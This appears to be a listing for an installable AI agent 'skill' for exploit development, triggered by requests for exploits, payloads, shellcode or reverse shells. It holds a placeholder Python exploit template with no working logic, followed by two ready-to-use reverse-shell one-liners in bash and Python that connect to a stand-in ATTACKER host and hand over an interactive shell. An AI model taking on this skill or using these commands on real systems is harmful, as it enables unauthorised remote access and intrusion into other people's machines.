Loading...
Loading...
Exploit development workflow. Use when: write exploit, PoC, payload, shellcode, bypass, buffer overflow, RCE, reverse shell.
npx skill4agent add duck4nh/antigravity-kit mode-exploit#!/usr/bin/env python3
"""
Exploit: [CVE-XXXX-XXXX / Vuln Name]
Target: [Software/Version]
Type: [RCE/SQLi/LFI/etc]
Author: [Name]
"""
import argparse
import requests
def exploit(target: str, cmd: str = "id") -> str:
"""Main exploit logic"""
# Exploit code here
pass
def main():
parser = argparse.ArgumentParser(description="Exploit description")
parser.add_argument("target", help="Target URL/IP")
parser.add_argument("-c", "--cmd", default="id", help="Command to execute")
args = parser.parse_args()
result = exploit(args.target, args.cmd)
print(result)
if __name__ == "__main__":
main()# Reverse shell (bash)
bash -i >& /dev/tcp/ATTACKER/PORT 0>&1
# Python reverse shell
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("ATTACKER",PORT));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'